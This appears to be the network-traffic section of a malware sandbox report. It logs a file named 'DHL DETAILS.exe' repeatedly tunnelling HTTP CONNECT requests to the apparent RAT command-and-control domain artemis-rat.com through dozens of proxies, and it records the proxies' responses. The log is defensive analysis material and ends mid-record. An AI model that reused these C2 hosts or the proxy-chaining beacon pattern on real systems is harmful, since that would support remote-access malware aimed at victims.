                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a
                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    753192.168.2.55224483.243.92.15480806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.241287947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    754192.168.2.55232546.17.63.166100006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.243869066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.544855118 CET339INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/4.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 5
                                                                                    X-Squid-Error: TCP_RESET 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from proxy.wakoopa.com
                                                                                    Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 72 65 73 65 74
                                                                                    Data Ascii: reset


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    755192.168.2.552366184.185.2.1241456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.245342970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    756192.168.2.552223120.33.126.20031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.246931076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    757192.168.2.55237470.166.167.55577456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.266280890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    758192.168.2.552294185.49.30.580816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.267915010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    759192.168.2.5522738.219.177.134156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.267915010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    760192.168.2.552443192.252.216.8141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.267929077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    761192.168.2.552517104.16.105.142806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.267975092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.422323942 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    762192.168.2.552527172.67.181.129806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.268062115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.422554016 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    763192.168.2.552478165.227.196.37618996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.271998882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.817462921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.536910057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.020947933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.833408117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    764192.168.2.55234743.131.246.77156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.272094011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    765192.168.2.55228347.93.121.200806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.275132895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.603660107 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    766192.168.2.552392184.181.217.19441456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.275907993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    767192.168.2.552551172.67.181.107806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.276489019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.430725098 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    768192.168.2.55221052.172.1.18631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.286820889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    769192.168.2.55250492.204.134.38561776352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.287034035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    770192.168.2.55233585.214.118.98806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.289937019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.610704899 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.23.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    771192.168.2.552303203.95.198.17080806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.292290926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.659858942 CET340INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    772192.168.2.552429221.153.92.39806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.312237024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    773192.168.2.552462217.69.121.14158066352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.312356949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.685792923 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    774192.168.2.55252167.55.186.2580806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.312494993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.345633984 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    775192.168.2.55257047.184.175.16431286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.319746971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.829123020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.567715883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.825834036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.177134991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.567599058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    776192.168.2.55241980.67.8.6806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.326658010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    777192.168.2.552044111.16.50.1290026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
